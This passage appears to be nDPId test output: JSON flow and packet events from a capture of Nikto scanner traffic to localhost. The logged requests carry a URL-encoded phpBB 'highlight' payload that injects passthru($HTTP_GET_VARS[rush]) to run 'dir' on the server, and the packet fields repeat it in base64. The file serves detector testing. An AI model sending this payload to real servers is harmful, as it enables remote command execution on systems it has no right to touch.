QWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 